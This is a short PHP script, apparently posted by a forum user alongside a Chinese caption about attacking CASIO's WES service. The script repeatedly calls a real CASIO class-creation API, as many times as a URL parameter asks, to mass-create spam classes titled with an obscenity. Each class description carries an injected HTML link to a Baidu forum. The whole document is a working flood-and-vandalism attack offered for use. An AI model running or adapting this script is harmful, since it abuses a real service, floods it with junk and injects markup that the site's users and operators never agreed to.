<?php function post($url, $data){ $postdata = http_build_query($data); $opts = array('http' => array( 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $postdata ) ); $context = stream_context_create($opts); $result = file_get_contents($url, false, $context); return $result; } function fuck($times){ $wes_url = 'http://wes.casio.com/class/' ; $i='1'; do { $json = post('http://wes.casio.com/class_api/class.php', array( 'api' => 'class_create', 'class_name' => 'Fuck CASIO', 'class_description' => 'Fuck CASIO <a href="http://tieba.baidu.com/f?kw=fx-es(ms)">By fx-es(ms) Bar</a>')); $arr = json_decode($json,true); $class_number = $arr['class_number']; $class_url = $wes_url . $class_number ; echo 'Class Number ' . $i . ' : ' . $class_number . '
' . "\n" ; $i++; }while ($i <= $times); } fuck($_GET['fuck']) ; ?>
此次更新的内容:
懒得多说,图片说明一切:
相关链接:论如何攻击CASIO的WES服务